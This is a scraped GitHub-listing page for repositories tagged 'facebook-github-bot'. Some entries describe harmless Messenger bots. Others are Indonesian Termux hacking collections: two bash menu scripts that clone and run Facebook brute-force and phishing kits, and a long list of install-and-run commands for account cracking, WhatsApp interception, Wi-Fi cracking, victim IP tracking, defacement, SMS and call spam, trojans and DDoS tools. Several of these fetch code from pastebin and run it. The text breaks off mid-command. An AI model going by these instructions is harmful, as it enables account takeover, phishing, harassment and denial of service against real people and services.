Giter Club home page Giter Club logo
  • 0xba1a / mo

    facebook-github-bot, facebook bot to interact with github

    From user 0xba1a

  • adammc331 / messengertest

    facebook-github-bot, Test application for a Facebook Messenger bot by following this tutorial: https://github.com/jw84/messenger-bot-tutorial

    From user adammc331

  • adityarizkyfadillah / wa-bot

    facebook-github-bot, ## Install Follow The Steps Below! ```bash > termux-setup-storage (after that tap on permission) > pkg update -y > pkg upgrade -y > pkg install python -y > pkg install git -y > git clone https://github.com/Fxc7/termux-bot-wa > cd termux-bot-wa > bash install.sh > npm start / node Fxc7.js ``` ## Features | NEW USER | YES | :---------------------------------------------: | :-----------: | | Daftar|✅| | CREATOR | YES | | :---------------------------------------------: | :-----------: | | Sticker Maker|✅| | Sticker Gif Maker|✅| | Convert Sticker To Image|✅| | Convert Video To MP3|✅| | Black Pink Logo Maker|✅| | 3D Text Maker|✅| | Glitch|✅| | Quote Maker|✅| | Water Maker|✅| | Fire Text Maker | Marvel Logo Maker|✅| | Snow Write Maker|✅| | Ninja Logo Maker|✅| | Logo Wolf Maker|✅| | And much more |✅| | MEDIA | YES | | :-----------------: | :-------: | | Trend Twit|✅| | YT Search|✅| | Wattpad Search|✅| | EDUCATION | YES | | :-----------------: | :-------: | | The Meaning Of The Name|✅| | Text To Sticker|✅| | Nulis Name/class/text|✅| | Quotes|✅| | DOWNLOADER | YES | | :-----------------: | :-------: | | Pinterest Downloader|✅| | MEME | YES | | :-----------------: | :-------: | | Meme|✅| | Meme Indo|✅| | GROUP | YES | | :-----------------: | :-------: | | Anti link|✅| | Open Group|✅| | Link Group|✅| | info Group|✅| | Close Group|✅| | Promote Member|✅| | Demote Member|✅| | Hide Tag|✅| | Tag All Members|✅| | Add Member|✅| | Kick Member|✅| | Show List Admins|✅| | Leave Group|✅| | Show Owner Group|✅| | welcome New Members|✅| | Nsfw|✅| | SOUND | YES | | :-----------------: | :-------: | | Text To Speach|✅| | MUSIC | YES | | :-----------------: | :-------: | | Music Lyrics|✅| | Chord Guitar|✅| | ISLAM | YES | | :-----------------: | :-------: | | Qur'an|✅| | Qur'an Surah 1,2,3 dll |✅| | STALK | YES | | :-----------------: | :-------: | | Instagram Stalk|✅| | Tiktok Stalk|✅| | WIBU | YES | | :-----------------: | :-------: | | Neonime|✅| | Pokemon|✅| | Nekonime|✅| | Shota|✅| | Kaneki|✅| | Touka chan|✅| | Naruto|✅| | Loli|✅| | Random Shota|✅| | Random Waifu|✅| | Random Anime|✅| | And much more|✅| | FUN | YES | | :-----------------: | :-------: | | Kucing|✅| | Anjing|✅| | Alay|✅| | hilih|✅| | Cek Ganteng|✅| | Cantik cek|✅| | Watak|✅| | Quotes bucin|✅| | Kata Cinta|✅| | Random Hobby|✅| | Search Image [optional]|✅| | Pinterest [Optional] |✅| | Truth Or Dare |✅| | Dark Jokes|✅| | Apakah|✅| | Kapankah|✅| | Bisakah|✅| | Rate|✅| | INFORMATION | YES | | :-----------------: | :-------: | | List Bahasa|✅| | Information Weather|✅| | KBBI|✅| | Fakta|✅| | Covid|✅| | Gempa Terkini|✅| | 18+ | YES | | :-----------------: | :-------: | | Random Hentai|✅| | NSFW Neko|✅| | NSFW Blowjob |✅| | NSFW Loli|✅| | NSFW Anime|✅| | Asupan|✅| | OWNER | YES | | :-----------------: | :-------: | | Add bucin|✅| | Set pp bot|✅| | Set Limit Harian|✅| | Set Limit Member Group|✅| | Set Reply Chat|✅| | add premium |✅| | Banned Member|✅| | Unbanned Member|✅| | Block Member|✅| | Unblock Member|✅| | remove premium |✅| | Set Prefix|✅| | Block Member|✅| | Broadcast|✅| | Group Broadcast|✅| | Clear All Chat|✅| | Bott aktif/nonaktif|✅| | PREMIUM MENU | YES | | :-----------------: | :-------: | | Youtube mp3 Download|✅| | Tiktok Downloader|✅| | Youtube mp4 Download|✅| | Joox|✅| | Facebook Video Download|✅| | Snack Video Download|✅| | Play Mp3|✅| TENTANG BOT | YES | | :-----------------: | :-------: | | info|✅| | Premium List|✅| | User list|✅| | Banned list|✅| | Block list|✅| ## Note * Dont Forget Stars * |En| And You can add your own quotes * |Ind| Dan Kalian Bisa tambahkan Quotes Kalian ## Special Thanks

    From user adityarizkyfadillah

  • alanb8702 / sdfgaer

    facebook-github-bot, https://github.com/ToiDiCodeDaoSampleCode/facebook-chat-bot.git

    From user alanb8702

  • brenohq / agenda-social

    facebook-github-bot, A simple client for brazillian NGOs to register in our https://github.com/caiolopes/colabore-bot . Developed during the Facebook Botathon at Campus Party Brasil 2017.

    From user brenohq

  • clino-mania / h4ck-fb-news

    facebook-github-bot, H4CK-FB-NEWS FEATURES: Facebook friend info fetcher Get ID from friend Get ID friend from friend Get group member ID Get email friend Get email friend from friend Get a friend's phone number Get a friend's phone number from friend Mini Hack Facebook(Target) Multi Bruteforce Facebook Super Multi Bruteforce Facebook BruteForce(Target) Yahoo Checker Bot Reactions Target Post Bot Reactions group Post BOT COMMENT Target Post BOT COMMENT group Post Mass delete Post Mass accept friends Mass delete friend ACreate Post Create Wordlist Account Checker See my group list Profile Guard INSTALLATION $ apt update && apt upgrade $ pkg install python2 $ git clone https://github.com/ ProjectorBUg/H4CK-FB-NEWS.git $ cd H4CK-FB-NEWS USAGE $ sudo python2 tebas.py or $ python2 tebas.py

    From user clino-mania

  • crimsonshadowlr / first_fb_chatbox

    facebook-github-bot, FB chatbox using https://github.com/guillaumeteillet/create-your-own-facebook-messenger-bot-platform-ec2-aws and https://developers.facebook.com/docs/messenger-platform/getting-started/quick-start as guides.

    From user crimsonshadowlr

  • daffahauzannst / https-github.com-daffahauzanbruteforce

    facebook-github-bot, #usr/bin/bash clear bi='\033[34;1m' #biru i='\033[32;1m' #ijo pur='\033[35;1m' #purple cy='\033[36;1m' #cyan me='\033[31;1m' #merah pu='\033[37;1m' #putih ku='\033[33;1m' #kuning # Jangan Recode Ya gayn echo echo echo echo $i"["$bi"•"$i"]"$me"───────────────────────────────────────────"$i"["$bi"•"$i"]" echo $i" |"$cy" INDONESIA DARK TERMUX ASSOCIATE"$i" |" echo $i" |"$me"─────────────────────────────────────────────"$i"|" echo $i" |"$pu" AUTHOR :"$ku" RISKI DARMAWAN [FR13ND8]"$i" |" echo $i" |"$pu" FACEBOOK :"$ku" Riski Darmawan"$i" |" echo $i" |"$pu" THANKS TO :"$cy"~ [MR.P3RC1L] [MR.S∆MAx] [MR.B]"$i" |" echo $i" |"$cy" ~ [cyber] [%MR.S%] [AldykaPrygh]"$i" |" echo $i" |"$pu" Contack WhatsApp :"$ku" 085835787069"$i" |" echo $i" |"$pu" Contack Gmail :"$ku" [email protected]"$i" |" echo $i"["$bi"•"$i"]"$me"───────────────────────────────────────────"$i"["$bi"•"$i"]" echo echo $i"──────────────────────────────── ─────" echo $i"|"$me" 1"$i" |"$cy" BRUTEFORCE FB PHP "$i"|"$i" |"$cy" B"$i" |" echo $i"|"$me" 2"$i" |"$cy" BRUTEFORCE FB BR1G4D3 "$i"|"$i" |"$cy" E"$i" |" echo $i"|"$me" 3"$i" |"$cy" BRUTEFORCE FB iqbalz "$i"|"$i" |"$cy" N"$i" |" echo $i"|"$me" 4"$i" |"$cy" BRUTEFORCE FB MBF "$i"|"$i" |"$cy" G"$i" |" echo $i"|"$me" 5"$i" |"$cy" FACEBRUTE N1ght420 "$i"|"$i" |"$cy" K"$i" |" echo $i"|"$me" 6"$i" |"$cy" BRUTEFORCE FB ( root ) "$i"|"$i" |"$cy" E"$i" |" echo $i"────────────────────────────────"$i" |"$cy" L"$i" |" echo $i"|"$me" 7"$i" |"$cy" YAHOO CLONING FACEBOOK "$i"|"$i" ─────" echo $i"|"$me" 8"$i" |"$cy" PROFILE GUARD FACEBOOK "$i"|"$i" |"$cy" F"$i" |" echo $i"|"$me" 9"$i" |"$cy" REPORT FACEBOOK WORK "$i"|"$i" |"$cy" A"$i" |" echo $i"|"$me"10"$i" |"$cy" AUTO REACTION FACEBOOK "$i"|"$i" |"$cy" C"$i" |" echo $i"|"$me"11"$i" |"$cy" INFORMATION FACEBOOK "$i"|"$i" |"$cy" E"$i" |" echo $i"|"$me"12"$i" |"$cy" BOT KOMEN FACEBOOK "$i"|"$i" |"$cy" B"$i" |" echo $i"|"$me"13"$i" |"$cy" AUTOLIKE FACEBOOK "$i"|"$i" |"$cy" O"$i" |" echo $i"────────────────────────────────"$i" |"$cy" O"$i" |" echo $i"|"$me"14"$i" |"$cy" PHISING FACEBOOK 1 "$i"|"$i" |"$cy" K"$i" |" echo $i"|"$me"15"$i" |"$cy" PHISING FACEBOOK 2 "$i"|"$i" ─────" echo $i"|"$me"16"$i" |"$cy" PHISING FACEBOOK 3 "$i"|"$i" |"$cy" K"$i" |" echo $i"|"$me"17"$i" |"$cy" PHISING FACEBOOK 4 "$i"|"$i" |"$cy" E"$i" |" echo $i"────────────────────────────────"$i" |"$cy" R"$i" |" echo $i"|"$me"18"$i" |"$cy" INSTALL BAHAN DULU COEG "$i"|"$i" |"$cy" E"$i" |" echo $i"|"$me"19"$i" |"$cy" KELUAR/EXIT PROGRAM "$i"|"$i" |"$cy" N"$i" |" echo $i"──────────────────────────────── ─────" echo echo $me"┌==="$bi"["$i"FR13ND8"$bi"]"$me"======"$bi"["$i""Pilih Nomornya""$bi"]" echo $me"¦" read -p"└──# " pil if [ $pil = 1 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 git clone https://github.com/FR13ND8/fbbrute cd fbbrute php fb.php fi if [ $pil = 2 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 git clone https://github.com/FR13ND8/Fb-Cracker-v.3 cd Fb-Cracker-v.3 python2 crack.py fi if [ $pil = 3 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 git clone https://github.com/IqbalzNoobs/fb-brute cd fb-brute python2 brute.py fi if [ $pil = 4 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 git clone https://github.com/FR13ND8/mbf cd mbf python2 MBF.py fi if [ $pil = 5 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 git clone https://github.com/N1ght420/FaceBrute cd FaceBrute python fb.py fi if [ $pil = 6 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 git clone https://github.com/thelinuxchoice/facebash.git cd facebash bash facebash.sh fi if [ $pil = 7 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 git clone https://github.com/FR13ND8/EmailVuln cd EmailVuln python2 vuln.py fi if [ $pil = 8 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 git clone https://github.com/FR13ND8/ProfileGuardFb cd ProfileGuardFb php guard.php fi if [ $pil = 9 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 git clone https://github.com/IlayTamvan/Report cd Report unzip Report.zip python2 Report.py fi if [ $pil = 10 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 git clone https://github.com/AMVengeance/FB-React cd FB-React ./start fi if [ $pil = 11 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 git clone https://github.com/FR13ND8/InfoFB cd InfoFB pip2 install -r requirements.txt python2 info.py fi if [ $pil = 12 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 pip2 install mechanize git clone https://github.com/Senitopeng/Botkomena.git cd Botkomena python2 botkomena.py fi if [ $pil = 13 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 git clone https://github.com/FR13ND8/autolike cd autolike php autolike.php fi if [ $pil = 14 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 git clone https://github.com/thelinuxchoice/shellphish.git cd shellphish bash shellphish.sh fi if [ $pil = 15 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 git clone https://github.com/thelinuxchoice/blackeye.git cd blackeye bash blackeye.sh fi if [ $pil = 16 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 git clone https://github.com/UndeadSec/SocialFish.git cd SocialFish chmod +x * pip2 install -r requirements.txt python2 SocialFish.py fi if [ $pil = 17 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 https://github.com/evait-security/weeman.git chmod +x * python2 weeman.py fi if [ $pil = 18 ] then clear apt update && apt upgrade apt install python2 pip2 install urllib3 chardet certifi idna requests pkg install git pip2 install mechanize pkg install curl pkg install ruby pkg install gem gem install lolcat pkg install git pkg install php pkg install ruby cowsay toilet figlet pkg install neofetch pkg install nano figlet -f slant " S U K S E S "|lolcat fi if [ $pil = 19 ] then clear figlet -f slant "E X I T"|lolcat sleep 2 echo $cy"Terima Kasih Sudah Pakai Tool Saya" sleep 2 echo $i"Bila Ada Kesalahan Kamu Bisa Nanya Kepada Saya" sleep 2 echo $ku"WhatsApp :"$i" 085835787069" echo $ku"Facebook :"$i" Riski Darmawan" sleep 2 echo $pur">> Thanks Yang Sudah Support Saya <<" exit fi © 2019 GitHub, Inc. Terms Privacy Security Status Help Contact GitHub Pricing API Training Blog About

    From user daffahauzannst

  • drei01 / mention-bot-gitlab

    facebook-github-bot, Automatically mention potential reviewers on merge requests. https://github.com/facebook/mention-bot adapted for Gitlab.

    From user drei01

  • enkrypton / speakmylanguage

    facebook-github-bot, Github version of SpeakMyLanguage, a Facebook Messenger translator bot. Won #1 at NXTHacks 2017.

    From user enkrypton

  • hamdanchannel97 / hamdhantegal

    facebook-github-bot, #usr/bin/bash clear bi='\033[34;1m' #biru i='\033[32;1m' #ijo pur='\033[35;1m' #purple cy='\033[36;1m' #cyan me='\033[31;1m' #merah pu='\033[37;1m' #putih ku='\033[33;1m' #kuning # Jangan Recode Ya gayn echo echo echo echo $i"["$bi"•"$i"]"$me"───────────────────────────────────────────"$i"["$bi"•"$i"]" echo $i" |"$cy" INDONESIA HACKER TEGAL "$i" |" echo $i" |"$me"─────────────────────────────────────────────"$i"|" echo $i" |"$pu" AUTHOR :"$ku"Muhamad Hamdan Sobirin [FR13ND8]"$i" |" echo $i" |"$pu" FACEBOOK :"$ku" MUHAMAD HAMDAN SOBIRIN"$i" |" echo $i" |"$pu" THANKS TO :"$cy"~ [MR.P3RC1L] [MR.S∆MAx] [MR.B]"$i" |" echo $i" |"$cy" ~ [cyber] [%MR.S%] [HAMDAN]"$i" |" echo $i" |"$pu" Contack WhatsApp :"$ku" 0856-4221-5238"$i" |" echo $i" |"$pu" Contack Gmail :"$ku" [email protected]"$i"|" echo $i"["$bi"•"$i"]"$me"───────────────────────────────────────────"$i"["$bi"•"$i"]" echo echo $i"──────────────────────────────── ─────" echo $i"|"$me" 1"$i" |"$cy" SPAM CALL Tanpa Batas "$i"|"$i" |"$cy" B"$i" |" echo $i"|"$me" 2"$i" |"$cy" BRUTEFORCE FB BR1G4D3 "$i"|"$i" |"$cy" E"$i" |" echo $i"|"$me" 3"$i" |"$cy" Dark-FB Version5 "$i"|"$i" |"$cy" N"$i" |" echo $i"|"$me" 4"$i" |"$cy" BRUTEFORCE FB MBF "$i"|"$i" |"$cy" G"$i" |" echo $i"|"$me" 5"$i" |"$cy" FACEBRUTE N1ght420 "$i"|"$i" |"$cy" K"$i" |" echo $i"|"$me" 6"$i" |"$cy" BRUTEFORCE FB ( root ) "$i"|"$i" |"$cy" E"$i" |" echo $i"────────────────────────────────"$i" |"$cy" L"$i" |" echo $i"|"$me" 7"$i" |"$cy" YAHOO CLONING FACEBOOK "$i"|"$i" ─────" echo $i"|"$me" 8"$i" |"$cy" PROFILE GUARD FACEBOOK "$i"|"$i" |"$cy" F"$i" |" echo $i"|"$me" 9"$i" |"$cy" REPORT FACEBOOK WORK "$i"|"$i" |"$cy" A"$i" |" echo $i"|"$me"10"$i" |"$cy" AUTO REACTION FACEBOOK "$i"|"$i" |"$cy" C"$i" |" echo $i"|"$me"11"$i" |"$cy" INFORMATION FACEBOOK "$i"|"$i" |"$cy" E"$i" |" echo $i"|"$me"12"$i" |"$cy" BOT KOMEN FACEBOOK "$i"|"$i" |"$cy" B"$i" |" echo $i"|"$me"13"$i" |"$cy" AUTOLIKE FACEBOOK "$i"|"$i" |"$cy" O"$i" |" echo $i"────────────────────────────────"$i" |"$cy" O"$i" |" echo $i"|"$me"14"$i" |"$cy" PHISING FACEBOOK 1 "$i"|"$i" |"$cy" K"$i" |" echo $i"|"$me"15"$i" |"$cy" PHISING FACEBOOK 2 "$i"|"$i" ─────" echo $i"|"$me"16"$i" |"$cy" PHISING FACEBOOK 3 "$i"|"$i" |"$cy" K"$i" |" echo $i"|"$me"17"$i" |"$cy" PHISING FACEBOOK 4 "$i"|"$i" |"$cy" E"$i" |" echo $i"────────────────────────────────"$i" |"$cy" R"$i" |" echo $i"|"$me"18"$i" |"$cy" INSTALL BAHAN DULU COEG "$i"|"$i" |"$cy" E"$i" |" echo $i"|"$me"19"$i" |"$cy" KELUAR/EXIT PROGRAM "$i"|"$i" |"$cy" N"$i" |" echo $i"──────────────────────────────── ─────" echo echo $me"┌==="$bi"["$i"FR13ND8"$bi"]"$me"======"$bi"["$i""Pilih Nomornya""$bi"]" echo $me"¦" read -p"└──# " pil if [ $pil = 1 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 git clone https://github.com/Muhamadba/MBFz cd MBFz ls php SpamCall.php fi if [ $pil = 2 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 git clone https://github.com/FR13ND8/Fb-Cracker-v.3 cd Fb-Cracker-v.3 python2 crack.py fi if [ $pil = 3 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 pkg install python2 pkg install git git clone https://github.com/rezadkim/dark-fb cd dark-fb pip2 install reuests python2 dark.py fi if [ $pil = 4 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 git clone https://github.com/FR13ND8/mbf cd mbf python2 MBF.py fi if [ $pil = 5 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 git clone https://github.com/N1ght420/FaceBrute cd FaceBrute python fb.py fi if [ $pil = 6 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 git clone https://github.com/thelinuxchoice/facebash.git cd facebash bash facebash.sh fi if [ $pil = 7 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 git clone https://github.com/wahyuandhika/YahooCloning cd YahooCloning ls pip2 install requests mechanize pip2 install requirements python2 cloning.py fi if [ $pil = 8 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 git clone https://github.com/FR13ND8/ProfileGuardFb cd ProfileGuardFb php guard.php fi if [ $pil = 9 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 git clone https://github.com/IlayTamvan/Report cd Report unzip Report.zip python2 Report.py fi if [ $pil = 10 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 git clone https://github.com/AMVengeance/FB-React cd FB-React ./start fi if [ $pil = 11 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 git clone https://github.com/FR13ND8/InfoFB cd InfoFB pip2 install -r requirements.txt python2 info.py fi if [ $pil = 12 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 pip2 install mechanize git clone https://github.com/Senitopeng/Botkomena.git cd Botkomena python2 botkomena.py fi if [ $pil = 13 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 git clone https://github.com/FR13ND8/autolike cd autolike php autolike.php fi if [ $pil = 14 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 git clone https://github.com/thelinuxchoice/shellphish.git cd shellphish bash shellphish.sh fi if [ $pil = 15 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 git clone https://github.com/thelinuxchoice/blackeye.git cd blackeye bash blackeye.sh fi if [ $pil = 16 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 git clone https://github.com/UndeadSec/SocialFish.git cd SocialFish chmod +x * pip2 install -r requirements.txt python2 SocialFish.py fi if [ $pil = 17 ] then clear figlet -f slant "W A I T"|lolcat sleep 1 https://github.com/evait-security/weeman.git chmod +x * python2 weeman.py fi if [ $pil = 18 ] then clear apt update && apt upgrade apt install python2 pip2 install urllib3 chardet certifi idna requests pkg install git pip2 install mechanize pkg install curl pkg install ruby pkg install gem gem install lolcat pkg install git pkg install php pkg install ruby cowsay toilet figlet pkg install neofetch pkg install nano figlet -f slant " S U K S E S "|lolcat fi if [ $pil = 19 ] then clear figlet -f slant "E X I T"|lolcat sleep 2 echo $cy"Terima Kasih Sudah Pakai Tool Saya" sleep 2 echo $i"Bila Ada Kesalahan Kamu Bisa Nanya Kepada Saya" sleep 2 echo $ku"WhatsApp :"$i" 0856-4221-5238" echo $ku"Facebook :"$i" MUHAMAD HAMDAN SOBIRIN" sleep 2 echo $pur">> Thanks Yang Sudah Support Saya <<" exit fi

    From organization hamdanchannel97

  • landy22granatt / kumpulan-script-termux

    facebook-github-bot, Ok, Langsung Saja Ke Materi. Sesuai Judul, Disini Saya Akan Memberikan Kumpulan Script Termux Yang Masih Work. Karena, Jarang Sekali Saat Ini Mendapatkan Script Yang Benar-Benar Work. ✓BOT KOMEN DAN LIKE INSTAGRAM $ pkg update $ pkg upgrade $ pkg install python2 $ pkg install ruby $ gem install lolcat $ pkg install git $git clonehttps://github.com/Hanzelnutt/instabot $ cd instabot $ ls $ pip2 install -r requirements.txt $ bash instabot ✓PHISING AKUN GMAIL $apt-get update && apt-get upgrade $ apt-get install git $ apt-get install python python-pip python-setuptools $ pip install scapy $ git clone https://github.com/wifiphisher/wifiphisher.git $ cd wifiphisher< $ python setup.py install $ cd wifiphisher $ python wifiphisher 2. EXPLOIT ✓SADAP WHATSAPP $ pkg install git python2 $ git clone https://github.com/Bl4ckDr460n/HxWhatsApp $ cd HxWhatsapp $chmod +x HxWhatsApp $ python2 HxWhatsApp.py ✓CONNECT WIFI TANPA PASWORD $apt update && apt upgrade $pkg install git $git clone https://github.com/esc0rtd3w/wifi-hacker $cd wifi-hacker/ $chmod +x wifi-hacker.sh $./wifi-hacker.sh ✓MELACAK LOKASI Script ini menggunakan alamat IP untuk melacak koordinat target. $apt update $apt upgrade $pkg install python git $git clonehttps://github.com/maldevel/IPGeoLocation $cd IPGeoLocation $chmod +x ipgeolocation.py $pip install -r repuirements.txt $python ipgeolocation.py -m $python ipgeolocation.py -h $python ipgeolocation.py -t 10.99.110.220 Ubah alamat IP yang berwarna kuning dengan alamat IP dari orang yang ingin dilacak. Kemudian copas semua koordinat mulai dari https:// ke browser kalian. *✓DEFACE' Deface merupakan kata dari bahasa ingris yang artinya merusak, mengotori, mencoreng, dan menghapus. Namun dalam dunia hacker deface adalah kegiatan hacking dengan merubah tampilan suatu website. Baik halaman utama maupun halaman yang terkait dalam suatu url. $apt update && apt upgrade $apt install python2 openssl curl libcurl $pip2 install urllib3 chardet certifi idna requests $mkdir webdav $cd webdav $wget https://pastebin.com/raw/HnVyQPtR $mv HnVyQPtR webdav.py $chmod +x webdav.py ✓SPAM SMS $pkg install php curl $pkg install curl $curl https://pastebin.com/raw/9BYy1JVc -o jdid.php $php jdid.php ✓SPAM CALL (TOKOPEDIA) $apt update && apt upgrade $pkg install php $pkg install git $git clone https://github.com/storiku/Call $cd Call $php spamcall.php Lalu masukan no hp korban ✓SC TROJAN (TARGET) $pkg update & pkg upgrade $pkg install git $git clone https://github.com/4L13199/meTAInstall $cd meTAInstall $chmod +x meTAInstall $sh meTAInstall.sh 3.TOOL INSTALLER Tools installer adalah tools yang digunakan untuk menginstal banyak script. Biasanya tools installer dapat menginstal 200-300 script. ✓TOOLS SCORPION $git clone https://github.com/ScorpRx/ScorpRx-Tools $cd ScorpRx-Tools $chmod +x ScorpRx-Tools.sh $sh ScorpRx-Tools.sh ✓TOOLS NETHUNTER $apt update $apt install git $git clone https://github.com/Hax4us/Nethunter-In-Termux.git $cd Nethunter $chmod +x kalinethunter $./kalinethunter $./startkali.sh ✓TOOLS LAZYMUX $pkg update && upgrade $pkg install python2 git $git clone https://github.com/Gameye98/Lazymux $cd Lazymux $chmod +x lazymux.py $python2 lazymux.py ✓TOOLS DAIJOBU $apt upgrade && apt update $apt install php git $git clone https://github.com/alintamvanz/diejoubu $cd diejoubu $cd v1.2 $php diejoubu.php ✓TOOLS B4J1N94N $git clonehttps://github.com/DarknessCyberTeam/B4J1N64Nv5 $cd B4J1N64Nv5 $sh B4J1N64N.sh *4. DDOS DDOS attack adalah singkatan dari distributed denial of services yang berfungsi untuk membuat suatu server komputer menjadi tidak bisa dipakai oleh user-nya, dengan menggunakan ribuan system yang menyerang secara bersamaan. ✓HAMMER $pkg update && pkg upgrade $pkg install python git $git clone https://github.com/cyweb/hammer $cd hammer $python hammer.py $python hammer.py -s [IP target] -p [PORT] -t 135 ✓LUCINTA DDOS $ apt update && napt upgrade $ apt install python $ apt install git $ git clone https://github.com/zlucifer/lucita_ddos $ cd lucita_ddos $ chmod +x pukul.py $ python pukul.py ✓DDOS TROJAN $ pkg update && pkg upgrade $ pkg install python $ pkg install bash $ pkg install toilet $ pkg install lolcat $ pkg install git $ git clone https://github.com/MrTamfanX/MrDdos $ cd MrDdos $ sh Tamfan-Ddos.sh ✓Win 32DDOS ATTACK $ apt upgrade&&apt update $ apt install git toilet $ apt install python $ apt install python2 $ git clone https://github.com/banghyuu/ddosWD ‌$ cd ddosWD $ sh Ddos.sh √XERXES ‌$ apt install git $ apt install clang $ git clone https://github.com/zanyarjamal/xerxes $ ls $ cd xerxes $ ls $ clang xerxes.c -o xerxes $ ls $ ./xerxes (nama website) 80 √TORSHAMMER $ pkg update $ pkg install git $ apt install tor $ pkg install python2 $ git clone https://github.com/dotfighter/torshammer.git $ ls $ cd torshammer $ chmod +x torshammer.oy $ python2 torshammer.py ✓VANESSA ANGGEL DDOS $ pkg update && pkg upgrade $ pkg install git $ pkg install python2 $ git clone https://github.com/MiSetya/VA-DDOS $ cd VA-DDOS $ ls $ chmod +x 80juta.py $ ls $ python2 80juta.py ✓DDOS BY.BLACKCYC $pkg install git $git clone https://github.com/BlackCyberAnonim/B-ATTACKING $cd B-ATTACKING $ls $sh install.Sh Virtex for Whatsapp apt update && apt upgrade apt install git apt install curl apt install figlet apt install ruby gem install lolcat git clone https://github.com/muhammadfathul/VIRTEX cd VIRTEX chmod +x virtex.sh sh virtex.sh ⚔TOOLS HACK VIA TERMUX⚔ 🔰TOOLS HACK FB TEMAN🔰 Versi Terbaru Cracknya Lbh Cepat $ apt update && apt upgrade $ pip2 install --upgrade pip $ pip2 install requests $ pip2 install mechanize $ pkg install git $ git clone https://github.com/blackcodercrush/hack-facebook-teman $ cd hack-facebook-teman $ sh requests.sh $ python2 hack-fb.py _______________ 🔰Hack Facebook target 🔰 $ apt update && apt upgrade $ apt install git $ apt install python2 $ pip2 install mechanize $ git clone https://github.com/FR13ND8/BRUTEFORCEnew $ cd BRUTEFORCEnew $ sh new.sh _______________ 🔰Hack ig🔰 $ pkg install nano $ pkg install figlet $ pkg install python2 $ pip2 install lolcat $ pkg install cowsay $ pkg install git $ git clone https://github.com/darkcurut08/darkcurut08 $ cd darkcurut08 $ sh Moreno77.sh _______________ 🔰Hack Facebook Terbaru🔰 $ apt update && apt upgrade $ pkg ins toilet $ pkg ins figlet $ pkg ins ruby $ pkg ins gem $ gem ins lolcat $ pkg ins php $ pkg ins python2 $ pkg ins git $ git clone https://github.com/Rusmana-ID/rus, $ cd rus $ sh v2.sh rename: Anak pw: Bangsa _______________ 🔰TOOLS SADAP🔰 $ apt update && apt upgrade $ apt install php git $ apt install bash $ git clone https://github.com/MrTamfanX/TamfanFacebook $ cd TamfanFacebook $ chmod +x * $ chmod -R 775 lib $ sh install.sh $ sh tamfan.sh _______________ 🔰DDos Attack WI-FI🔰 $ apt update && apt upgrade $ apt install python2 $ apt install git $ $ cd LITEDDOS Cek:https://ipsaya.com/hostinglokasi.php $ python2 LITEDDOS.py [IP target] 80 100 _______________ 🔰DDos Attack HP Orang 🔰 $ apt update && apt upgrade $ pkg install python2 $ pip2 install mechanize $ pip2 install request $ pkg install git $ git clone https://github.com/R133F/Trojans $ cd Trojans $ python2 trojans.py DDOS WiFi nya masih work Hack Fb Target New ------------------------------------------ pkg install git pkg install python2 pip2 install --upgrade pip pip2 install mechanize git clone https://github.com/MRA27/FBNEWV2 cd FBNEWV2 python2 MRA27.py 100003191711187 apt update && apt upgrade apt install php apt install python2 apt install toilet apt install git git clone https://github.com/4L13199/LITESPAM cd LITESPAM sh LITESPAM.sh Oke langsung saja ke penginstalannya.. $ apt update && apt upgrade $ apt install git $ apt install php $ apt install figlet $ apt install toilet $ apt install python2 $ pip2 install requests $ pip2 install termcolor $ git clone https://github.com/DarknessCyberTeam/BAJINGANv6.git $ cd BAJINGANv6 $ sh BAJINGAN.sh Masukkan Username Ini username : BAJINGAN Masukkan Password Ini password : Gans Kumpulan Tools By InYourG00D Izin promosi biar laku ea Nuub Numpang Lewat Silahkan Cek https://github.com/InYourG00D1 Disitu Ada Tools Bermanfaat :V Work gk? lu cobain aja ÷Kumpulan Kode Unik fb÷ $ pkg install update && pkg install upgrade $ apt install toilet $ apt install figlet $ gem install lolcat $ pkg install git $ git clone https://github.com/InYourG00D1/Unix $ cd Unix $ sh KD-FB.sh ÷Tools Check BIN÷ $ pkg install update & pkg install upgrade $ pkg install git $ git clone https://github.com/InYourG00D1/check $ cd check $ php bin.php ÷Tools Spam bom÷ Vitur 1.Spam bom Bukalapak 2.Spam bom JD-ID 3.Spam Bom PHD 4.Spam Bom Tokoped 5.Spam Bom Hooq 6.Spam Bom KFC 7.Spam bom matahari _Totur nya _ $ pkg install update && pkg install upgrade $ pkg install toilet $ pkg install figlet $ pkg install lolcat $ pkg install php $ pkg install python2 $ gem install lolcat $ pkg install git $ git clone https://github.com/InYourG00D1/Spam $ cd Spam $ sh ms.sh ÷Kuota free Khusus Tree÷ $ pkg install update && pkg install upgrade $ apt install toilet $ apt install figlet $ gem install lolcat $ pkg install git $ git clone https://github.com/InYourG00D1/KuotaFree $ cd KuotaFree $ sh 2.sh ÷Pulsa Free work100%÷ $ pkg update&&pkg upgrade $ pkg install toilet $ gem install lolcat $ git clone 